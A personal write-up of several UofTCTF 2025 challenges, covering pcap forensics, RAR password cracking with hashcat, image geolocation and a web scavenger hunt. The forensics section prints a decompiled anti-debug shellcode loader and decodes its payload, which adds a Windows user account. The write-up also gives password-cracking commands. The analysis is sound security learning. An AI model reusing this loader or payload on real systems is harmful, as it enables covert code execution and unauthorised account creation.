CTF-Writeups

UofTCTF 2025!

I participated in UofTCTF 2025, organized by the University of Toronto Capture the Flag team, as a member of my institute’s club, InfoSecIITR. These writeups cover the Miscellaneous, Web and Forensics challenges that I personally solved during the competition.

Forensics

Poof

Challenge Description

Yet another pcap, no usb traffic in this one so I’m lost. Can you help me out? :)

Author: 0x157

Solution

This year, we only received one challenge from 0x157 because he was sick. We were given a poof.pcapng file for this challenge. My excitement from the previous pcap challenges, like Skat’s challenge in IrisCTF ‘25, hadn’t worn off yet.

This challenge was solved by my teammate during the competition while I was working on another one. I attempted this challenge later.

I began analyzing the pcapng file in Wireshark. First, I checked the Protocol Hierarchy Statistics, and this was the result:

Stats

Next, I examined the TCP packets and found this packet, which contained a listing of the files:

List of the files

I proceeded to export all the files that were shared:

Export Objects

Only kcaswqcd.ps1 turned out to be useful, so I started analyzing it.

What This Script Does:

  1. Variable and Object Creation:

    The script dynamically creates variables using Set-Variable and Set-Item.
    It utilizes PowerShell’s -f string format operator to concatenate strings and obfuscate key values.

  2. Decryption Logic:

    The script initializes cryptographic objects (e.g., AES decryption) and sets up parameters such as keys, initialization vectors (IVs), cipher mode, and padding.
    It reads encrypted content and decrypts it using the specified cryptographic parameters.

  3. Memory Stream Operations:

    The decrypted data is streamed through memory, likely preparing it for writing to a file.

  4. File Creation:

    The decrypted content is written to an executable file (.exe) in a temporary directory.

  5. Execution:

    The script invokes the newly created executable file using Start-Process.

I extracted the useful part from the ps code:

Powershell

From this, we obtained the CV, IV, and KEY. Let’s decrypt it on CyberChef as we already had 82nvdkandf.bin:

Cyberchef

After decrypting the file, I downloaded the PE file named poof.exe.

I initially attempted to analyze it using IDA and Ghidra but was unsuccessful. Then, I tried using dnSpy, which allowed me to view the desired code.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
Imports System
Imports System.Diagnostics
Imports System.Runtime.CompilerServices
Imports System.Runtime.InteropServices

Namespace Kljansdfkansdf
	' Token: 0x02000003 RID: 3
	<NullableContext(1)>
	<Nullable(0)>
	Public Class Kljansdfkansdf
		' Token: 0x06000009 RID: 9 RVA: 0x00002080 File Offset: 0x00000280
		Public Shared Sub kjfadsiewqinfqniowf(ncuasdhif As Byte())
			Dim num As UInteger = Win32.VirtualAlloc(0UI, CUInt(ncuasdhif.Length), Win32.MEM_COMMIT, Win32.PAGE_READWRITE)
			Marshal.Copy(ncuasdhif, 0, CType(CType(num, UIntPtr), IntPtr), ncuasdhif.Length)
			Dim num2 As UInteger
			Win32.VirtualProtect(CType(CType(num, UIntPtr), IntPtr), CType(CType(ncuasdhif.Length, IntPtr), UIntPtr), Win32.PAGE_EXECUTE_READ, num2)
			Dim zero As IntPtr = IntPtr.Zero
			Dim num3 As UInteger = 0UI
			Dim zero2 As IntPtr = IntPtr.Zero
			Win32.WaitForSingleObject(Win32.CreateThread(0UI, 0UI, num, zero2, 0UI, num3), UInteger.MaxValue)
		End Sub

		' Token: 0x0600000A RID: 10 RVA: 0x000020E4 File Offset: 0x000002E4
		Private Shared Sub Main(args As String())
			Win32.ShowWindow(Win32.GetConsoleWindow(), Win32.SW_HIDE)
			If Debugger.IsAttached Then
				Environment.[Exit](0)
			End If
			For Each process As Process In Process.GetProcesses()
				If process.ProcessName.Contains("devenv") OrElse process.ProcessName.Contains("dnspy") Then
					Environment.[Exit](0)
				End If
			Next
			Dim array As Byte() = New Byte() { 129, 149, Byte.MaxValue, 125, 125, 125, 29, 244, 152, 76, 189, 25, 246, 45, 77, 246, 47, 113, 246, 47, 105, 246, 15, 85, 114, 202, 55, 91, 76, 130, 209, 65, 28, 1, 127, 81, 93, 188, 178, 112, 124, 186, 159, 143, 47, 42, 246, 47, 109, 246, 55, 65, 246, 49, 108, 5, 158, 53, 124, 172, 44, 246, 36, 93, 124, 174, 246, 52, 101, 158, 71, 52, 246, 73, 246, 124, 171, 76, 130, 209, 188, 178, 112, 124, 186, 69, 157, 8, 139, 126, 0, 133, 70, 0, 89, 8, 153, 37, 246, 37, 89, 124, 174, 27, 246, 113, 54, 246, 37, 97, 124, 174, 246, 121, 246, 124, 173, 244, 57, 89, 89, 38, 38, 28, 36, 39, 44, 130, 157, 34, 34, 39, 246, 111, 150, 240, 32, 23, 124, 240, 248, 207, 125, 125, 125, 45, 21, 76, 246, 18, 250, 130, 168, 198, 141, 200, 223, 43, 21, 219, 232, 192, 224, 130, 168, 65, 123, 1, 119, 253, 134, 157, 8, 120, 198, 58, 110, 15, 18, 23, 125, 46, 130, 168, 30, 16, 25, 93, 82, 30, 93, 19, 24, 9, 93, 8, 14, 24, 15, 93, 17, 24, 26, 20, 9, 8, 14, 24, 15, 93, 8, 18, 27, 9, 30, 9, 27, 6, 42, 73, 14, 34, 76, 41, 34, 47, 78, 28, 17, 17, 4, 34, 28, 51, 34, 52, 16, 13, 17, 73, 19, 9, 66, 66, 0, 93, 82, 28, 25, 25, 93, 82, 4, 125 }
			Dim b As Byte = 125
			For j As Integer = 0 To array.Length - 1
				Dim array2 As Byte() = array
				Dim num As Integer = j
				array2(num) = array2(num) Xor b
			Next
			Kljansdfkansdf.kjfadsiewqinfqniowf(array)
		End Sub
	End Class
End Namespace

As you can see, it was performing an XOR operation, so I wrote a script to decode it:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Given encrypted byte array
encrypted_array = [
    129, 149, 255, 125, 125, 125, 29, 244, 152, 76, 189, 25, 246, 45, 77, 246, 47, 113, 246, 47,
    105, 246, 15, 85, 114, 202, 55, 91, 76, 130, 209, 65, 28, 1, 127, 81, 93, 188, 178, 112, 124,
    186, 159, 143, 47, 42, 246, 47, 109, 246, 55, 65, 246, 49, 108, 5, 158, 53, 124, 172, 44, 246,
    36, 93, 124, 174, 246, 52, 101, 158, 71, 52, 246, 73, 246, 124, 171, 76, 130, 209, 188, 178,
    112, 124, 186, 69, 157, 8, 139, 126, 0, 133, 70, 0, 89, 8, 153, 37, 246, 37, 89, 124, 174, 27,
    246, 113, 54, 246, 37, 97, 124, 174, 246, 121, 246, 124, 173, 244, 57, 89, 89, 38, 38, 28, 36,
    39, 44, 130, 157, 34, 34, 39, 246, 111, 150, 240, 32, 23, 124, 240, 248, 207, 125, 125, 125, 45,
    21, 76, 246, 18, 250, 130, 168, 198, 141, 200, 223, 43, 21, 219, 232, 192, 224, 130, 168, 65,
    123, 1, 119, 253, 134, 157, 8, 120, 198, 58, 110, 15, 18, 23, 125, 46, 130, 168, 30, 16, 25, 93,
    82, 30, 93, 19, 24, 9, 93, 8, 14, 24, 15, 93, 17, 24, 26, 20, 9, 8, 14, 24, 15, 93, 8, 18, 27, 9,
    30, 9, 27, 6, 42, 73, 14, 34, 76, 41, 34, 47, 78, 28, 17, 17, 4, 34, 28, 51, 34, 52, 16, 13, 17,
    73, 19, 9, 66, 66, 0, 93, 82, 28, 25, 25, 93, 82, 4, 125
]

# XOR key
key = 125

# Decrypt the payload using XOR
def xor_decrypt(data, key):
    return [byte ^ key for byte in data]

# Decrypt the array
decrypted_array = xor_decrypt(encrypted_array, key)

# Convert to bytes for further analysis
decrypted_bytes = bytes(decrypted_array)

print(decrypted_bytes)

I ran the script and obtained the following output:

1
2
$ python3 decode.py
b'\xfc\xe8\x82\x00\x00\x00`\x89\xe51\xc0d\x8bP0\x8bR\x0c\x8bR\x14\x8br(\x0f\xb7J&1\xff\xac<a|\x02, \xc1\xcf\r\x01\xc7\xe2\xf2RW\x8bR\x10\x8bJ<\x8bL\x11x\xe3H\x01\xd1Q\x8bY \x01\xd3\x8bI\x18\xe3:I\x8b4\x8b\x01\xd61\xff\xac\xc1\xcf\r\x01\xc78\xe0u\xf6\x03}\xf8;}$u\xe4X\x8bX$\x01\xd3f\x8b\x0cK\x8bX\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89D$$[[aYZQ\xff\xe0__Z\x8b\x12\xeb\x8d]j\x01\x8d\x85\xb2\x00\x00\x00Ph1\x8bo\x87\xff\xd5\xbb\xf0\xb5\xa2Vh\xa6\x95\xbd\x9d\xff\xd5<\x06|\n\x80\xfb\xe0u\x05\xbbG\x13roj\x00S\xff\xd5cmd /c net user legituser uoftctf{W4s_1T_R3ally_aN_Impl4nt??} /add /y\x00'

We got our flag!

Flag:

1
uoftctf{W4s_1T_R3ally_aN_Impl4nt??}

Decrypt Me

Challenge Description

I encrypted my encryption script, but I forgot the password. Can you help me decrypt it?

Author: SteakEnthusiast

Solution

In this challenge, we received a password-protected RAR file using version 5.

I examined the file’s hex using the bvi hex editor and noticed that it contained flag.py and another file, flag.enc, stored as Alternate Data Streams (ADS), as shown below:

Hex Data

As expected, we needed to brute-force the password using Hashcat with a dictionary attack. To start, we needed the hash for the password of the file, so I used John the Ripper’s tool rar2john:

1
$ ./rar2john flag.rar > hash_rar.txt

For brute-forcing with Hashcat, we need to remove everything before the colon in the output. The remaining content of hash_rar.txt was:

1
2
$rar5$16$1d7cb8859a6c3c8e30a9db7a501811ac$15$280234db9d29c6ab216b74e6a89ec226$8$d12d4ba211b9c642
$rar5$16$1d7cb8859a6c3c8e30a9db7a501811ac$15$7d06143b1a7dab3327b3ef1e41ad881a$8$d12d4ba211b9c642

Since flag.rar contained two files, we ended up with two hashes. Hashcat would first brute-force the first hash, and then proceed with the second one.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ hashcat -m 13000 -a 0 -w 4 hash_rar.txt ~/Downloads/rockyou.txt 
hashcat (v6.2.6) starting

[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => 

$rar5$16$1d7cb8859a6c3c8e30a9db7a501811ac$15$280234db9d29c6ab216b74e6a89ec226$8$d12d4ba211b9c642:toronto416
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13000 (RAR5)
Hash.Target......: $rar5$16$1d7cb8859a6c3c8e30a9db7a501811ac$15$280234...b9c642
.
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/g4rud4/Downloads/rockyou.txt)
.
Progress.........: 3119104/14344384 (21.74%)
Rejected.........: 0/3119104 (0.00%)
Restore.Point....: 3117056/14344384 (21.73%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:32768-32799
Candidate.Engine.: Device Generator
Candidates.#1....: torrisjames -> torit13
.

It took a considerable amount of time to brute-force the password since the author had set it at the 21.74% mark of the rockyou.txt file. The password turned out to be toronto416.

Initially, I used unrar to extract the files, but it only retrieved flag.py and not flag.enc. To extract both files from the RAR archive, I switched to using 7z, which successfully extracted them.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
./7z x flag.rar

7-Zip (z) 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-28
 64-bit locale=en_IN Threads:16 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 672 bytes (1 KiB)

Extracting archive: flag.rar
--
Path = flag.rar
Type = Rar5
Physical Size = 672
Characteristics = Locator QuickOpen:0
Encrypted = -
Solid = -
Blocks = 2
Method = v6:128K:m3
Multivolume = -
Volumes = 1
    
Enter password:toronto416

Everything is Ok

Files: 1
Alternate Streams: 1
Alternate Streams Size: 57
Size:       609
Compressed: 672

Content of the flag.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from Crypto.Hash import SHA256
from time import time
import random
random.seed(int(time()))
KEY = SHA256.new(str(random.getrandbits(256)).encode()).digest()
FLAG = "uoftctf{fake_flag}"

def encrypt_flag(flag, key):
    cipher = AES.new(key, AES.MODE_EAX)
    ciphertext, tag = cipher.encrypt_and_digest(flag.encode())
    return cipher.nonce + ciphertext

def main():
    encrypted_flag = encrypt_flag(FLAG, KEY)
    with open("flag.enc", "wb") as f:
        f.write(encrypted_flag)

if __name__ == "__main__":
    main()

Next, I created a decryption script to decrypt flag.enc and retrieve the flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
import random
from datetime import datetime

def get_unix_timestamp(dt_str):
    dt = datetime.strptime(dt_str, "%Y:%m:%d %H:%M:%S%z")
    return int(dt.timestamp())

def try_decrypt(encrypted_data, timestamp):
    random.seed(timestamp)
    
    key = SHA256.new(str(random.getrandbits(256)).encode()).digest()
    
    try:
        nonce = encrypted_data[:16]
        ciphertext = encrypted_data[16:]
        
        cipher = AES.new(key, AES.MODE_EAX, nonce=nonce)
        decrypted = cipher.decrypt(ciphertext)
        
        return decrypted.decode('utf-8')
    except Exception as e:
        return None

def main():
    target_time = "2025:01:06 07:43:39+05:30"
    unix_timestamp = get_unix_timestamp(target_time)
    
    with open("flag.enc", "rb") as f:
        encrypted_flag = f.read()
    
    for offset in range(-60, 61):
        test_timestamp = unix_timestamp + offset
        result = try_decrypt(encrypted_flag, test_timestamp)
        
        if result and "uoftctf{" in result:
            print(f"Found flag at timestamp {test_timestamp}!")
            print(f"Flag: {result}")
            return
    
    print("Flag not found in the tested time range")

if __name__ == "__main__":
    main()

I ran the script and obtained the following output:

1
2
3
4
$ python3 dec.py 

Found flag at timestamp 1736129619!  
Flag: uoftctf{ads_and_aes_are_one_letter_apart}

Finally, we got our flag.

Flag:

1
uoftctf{ads_and_aes_are_one_letter_apart}

Miscellaneous

Surgery

Challenge Description

I was thinking of getting some facial contouring plastic surgery done, but didn’t know who to go to. My friend said they had a recommendation for a doctor specializing in that, but only sent me this photo of some building. Who’s the doctor?
Before submitting, wrap the doctor’s name in uoftctf{}. Special characters allowed, [First] [Last] format.

For example, if the name was Jean-Pierre Brehier, the flag would be uoftctf{Jean-Pierre Brehier}

Author: windex

Solution

We received the following image file:

Building Image

I attempted a Google Image Search on this image with the prompt: “Where is this surgery place located?” and found this link: https://medtour.help/clinic/jk-plastic-surgery/. I confirmed that this was the correct building because the image matched perfectly.

On the same site, I found the names of several doctors:

Doctors

I began checking them one by one. It’s worth noting that in South Korea, names are written with the last name first, followed by the first name. So, I reversed the name order for each doctor.

After some time, I identified the correct doctor: Kim Sung-Sik.

Flag:

1
uoftctf{Sung-Sik Kim}

Web

Scavenger Hunt

Challenge Description

You know what to do.

Visit the website here

Author: SteakEnthusiast

Solution

This was an easy web challenge and had many solves, so I decided to attempt it. On the main page, it was mentioned that there would be seven parts of the flag.

I inspected all the CSS and JavaScript files by viewing the page source. There was also a /hidden_admin_panel endpoint for the admin. I gained access by modifying the cookies to change the user. One part of the flag was hidden in the headers as a key-value pair: X-Flag-Part2: c4lm_4nd_.

Altogether, we managed to collect all seven parts of the flag.

part 1: uoftctf{ju57_k33p_
p_a_r_t_f_i_v_e=4pp5_
part4=411_7h3_
part7 c0d3!!}
part3 1n5p3c7_
Part 6: 50urc3_
Part2: c4lm_4nd_

Flag:

1
uoftctf{ju57_k33p_c4lm_4nd_1n5p3c7_411_7h3_4pp5_50urc3_c0d3!!}